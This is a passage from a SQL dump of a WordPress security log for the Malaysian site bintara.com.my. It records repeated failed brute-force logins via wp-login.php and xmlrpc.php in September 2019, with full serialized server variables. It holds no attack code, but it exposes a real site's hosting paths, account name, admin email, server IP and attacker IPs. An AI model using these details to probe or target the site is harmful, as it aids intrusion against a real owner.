15:24:57',18347032,19646408,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.247.210'),(24612,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"27518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD7tH-mRYMgL5SYt2EJwwAAAVE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734132.1061\";s:12:\"REQUEST_TIME\";s:10:\"1568734132\";}}','notice','2019-09-17 15:28:53','2019-09-17 15:28:52',17740048,19232752,'https://bintara.com.my/wp-login.php',1,0,'178.62.9.122'),(24613,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"28592\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD7t-gg4cIpXyxKa540lAAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734135.7747\";s:12:\"REQUEST_TIME\";s:10:\"1568734135\";}}','notice','2019-09-17 15:28:57','2019-09-17 15:28:56',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.9.122'),(24614,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"34837\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD9O8ptRwTKB9qWFzHbrwAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734523.7378\";s:12:\"REQUEST_TIME\";s:10:\"1568734523\";}}','notice','2019-09-17 15:35:25','2019-09-17 15:35:24',17740112,19230080,'https://bintara.com.my/wp-login.php',1,0,'103.74.121.142'),(24615,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.121.142\";s:11:\"REMOTE_PORT\";s:5:\"35207\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD9PkViJhUiKk@yAoetCAAAAYE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734526.7298\";s:12:\"REQUEST_TIME\";s:10:\"1568734526\";}}','notice','2019-09-17 15:35:28','2019-09-17 15:35:27',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'103.74.121.142'),(24616,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.83.192.6\";s:11:\"REMOTE_PORT\";s:5:\"36782\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD98X-mRYMgL5SYt2EKIQAAAU0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734705.9081\";s:12:\"REQUEST_TIME\";s:10:\"1568734705\";}}','notice','2019-09-17 15:38:27','2019-09-17 15:38:26',17740648,19231488,'https://bintara.com.my/wp-login.php',1,0,'103.83.192.6'),(24617,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"103.83.192.6\";s:11:\"REMOTE_PORT\";s:5:\"37242\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD99EViJhUiKk@yAoetdAAAAYQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568734708.5893\";s:12:\"REQUEST_TIME\";s:10:\"1568734708\";}}','notice','2019-09-17 15:38:30','2019-09-17 15:38:29',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'103.83.192.6'),(24618,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"176.63.151.209\";s:11:\"REMOTE_PORT\";s:5:\"40038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD-x0ViJhUiKk@yAoeuXQAAAZQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735175.6336\";s:12:\"REQUEST_TIME\";s:10:\"1568735175\";}}','notice','2019-09-17 15:46:16','2019-09-17 15:46:15',17737656,19229368,'https://bintara.com.my/wp-login.php',1,0,'176.63.151.209'),(24619,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"176.63.151.209\";s:11:\"REMOTE_PORT\";s:5:\"40382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYD-zEViJhUiKk@yAoeuXgAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735180.3993\";s:12:\"REQUEST_TIME\";s:10:\"1568735180\";}}','notice','2019-09-17 15:46:21','2019-09-17 15:46:20',18257624,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'176.63.151.209'),(24620,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"46104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEAekTYugiOK@HgvAFkCgAAAQk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568735354.4004\";s:12:\"REQUEST_TIME\";s:10:\"1568735354\";}}','notice','2019-09-17 15:49:15','2019-09-17 